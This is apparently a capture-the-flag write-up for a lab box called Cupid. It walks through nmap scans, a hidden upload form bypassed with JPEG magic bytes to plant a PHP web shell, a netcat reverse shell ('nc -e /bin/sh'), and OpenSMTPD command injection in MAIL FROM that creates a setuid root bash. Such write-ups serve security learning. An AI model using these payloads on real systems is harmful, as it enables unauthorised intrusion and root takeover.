Hack. Sleep. Repeat

View on GitHub
TEE HEE HEE! Cupid, is an imaginary character. However, Cupid is not the only thing that is imaginary on this system (the box security is equally imaginary)...

Tickle cupid the right way and you'll be surprised.

Enumeration With Nmap

nmap -p- --min-rate 10000 -oA nmap/allports -v

# Nmap 7.91 scan initiated Thu Dec  2 20:33:19 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v
Increasing send delay for from 80 to 160 due to 67 out of 222 dropped probes since last increase.
Increasing send delay for from 160 to 320 due to 73 out of 242 dropped probes since last increase.
Increasing send delay for from 320 to 640 due to 34 out of 111 dropped probes since last increase.
Warning: giving up on port because retransmission cap hit (10).
Nmap scan report for
Host is up (0.15s latency).
Not shown: 51513 filtered ports, 14021 closed ports
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Dec  2 20:34:57 2021 -- 1 IP address (1 host up) scanned in 97.69 seconds

Scanning for full ports we know we have only one port open so let try some default and service detection switch on our nmap commands.

nmap -sC -sV -oA nmap/normal -p 80

# Nmap 7.91 scan initiated Thu Dec  2 20:38:46 2021 as: nmap -sC -sV -oA nmap/normal -p 80
Nmap scan report for
Host is up (0.17s latency).

80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to Cupid's homepage

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu Dec  2 20:38:58 2021 -- 1 IP address (1 host up) scanned in 12.04 seconds

We know we are hiting only HTTP port so let jump to it without wasting to much of time.


Interesting let check what we have in the source page.


That is some good hidden form for uploading.

<form action="upload.php" method="post" enctype="multipart/form-data"> Select image to upload:<br/><input type="file" name="image" id="image"><input type="submit" value="Upload Image" name="submit"></form>

Now we know it hidden when not inspect the webpage and add the html code to make it visible to us.


Now we are talking let try uploading a file php or jpg first using burp suite to intercept the request to see what is going on.


But seems we hit the rock let try changing Content-Type: application/x-php to Content-Type: image/jpeg let see what happened.


Ahhh ok that the same error let try uploading a valid jpeg image to observe what happened.


Now that is a valid jpeg image but the issue is the size we can only upload The maximum file size supported is 39 bytes now it getting more interesting let try some tricks.

Creating A JPEG File

└─$ touch muzec.txt      
└─$ echo -n -e '\xff\xd8\xff'>muzec.txt
└─$ file muzec.txt  
muzec.txt: JPEG image data

Now let try uploading it let see what happened.


Boom so the extension does not really matter hehehehe now let create our payload.

└─$ touch shell.php
└─$ echo -n -e '\xff\xd8\xff'>shell.php
└─$ file shell.php
shell.php: JPEG image data


Now let confirm the the size hope is not over 39 bytes .


We are cool now let upload it.


Boom uploaded and we have the path to access it let hit it.


Now let add our command to execute a command.


Boom we are good let get a reverse shell back to our terminal.


I use python one liner reverse shell to get back shell back to our terminal.


Now we are good let get root and we are done.

Privilege Escalation

www-data@cupidme:/home/ETSCTF$ ss -tulpn
Netid                State                 Recv-Q                 Send-Q                                 Local Address:Port                                  Peer Address:Port                                                                                                                                                                                                              
udp                  UNCONN                0                      0                                                           *                                                                                                                                                                                                                 
tcp                  LISTEN                0                      128                                                           *                    users:(("ss",pid=2330,fd=5),("bash",pid=2241,fd=5),("python",pid=2240,fd=5),("sh",pid=2218,fd=5),("python",pid=2217,fd=5),("sh",pid=2216,fd=5))                                              
tcp                  LISTEN                0                      128                                                               *                    users:(("nginx",pid=39,fd=6))                                                                                                                                                                
tcp                  LISTEN                0                      128                                                         *                                                                                                                                                                                                                 
tcp                  LISTEN                0                      5                                                               *                                                                                                                                                                                                                 

Now seems we have a port running locally 25 SMTP let grab the banner with Ncat.

www-data@cupidme:/home/ETSCTF$ nc -vn 25
(UNKNOWN) [] 25 (?) open

We are dealing with OpenSMTPD let check for some exploit.


We found an exploit on exploit-db written in python3 so i download it and transfer it to my target.

www-data@cupidme:/tmp$ ls
www-data@cupidme:/tmp$ chmod +x
www-data@cupidme:/tmp$ python3 25 'nc -e /bin/sh 1337'
python3: can't open file '': [Errno 2] No such file or directory
www-data@cupidme:/tmp$ python3 25 'nc -e /bin/sh 1337'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Now let check our Ncat listener and boom we are root.


We are done and a quick way to root with using the python script exploit.

www-data@cupidme:/tmp$ nc -v localhost 25                                                                                                                         [1/1]
localhost [] 25 (?) open                                                  
hello cupid                                                                        
500 5.5.1 Invalid command: Command unrecognized
HELO cupid                                                                         
250 Hello cupid [], pleased to meet you
MAIL FROM:<;install -m 6755 /bin/bash /tmp/root;>
250 2.0.0 Ok  
RCPT TO:<root>                                                                     
250 2.1.5 Destination address valid: Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 19966164 Message accepted for delivery
221 2.0.0 Bye            
www-data@cupidme:/tmp$ ls  root
www-data@cupidme:/tmp$ ./root -p
root-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

We are done thanks for reading mate.

Greeting From Muzec

Back To Home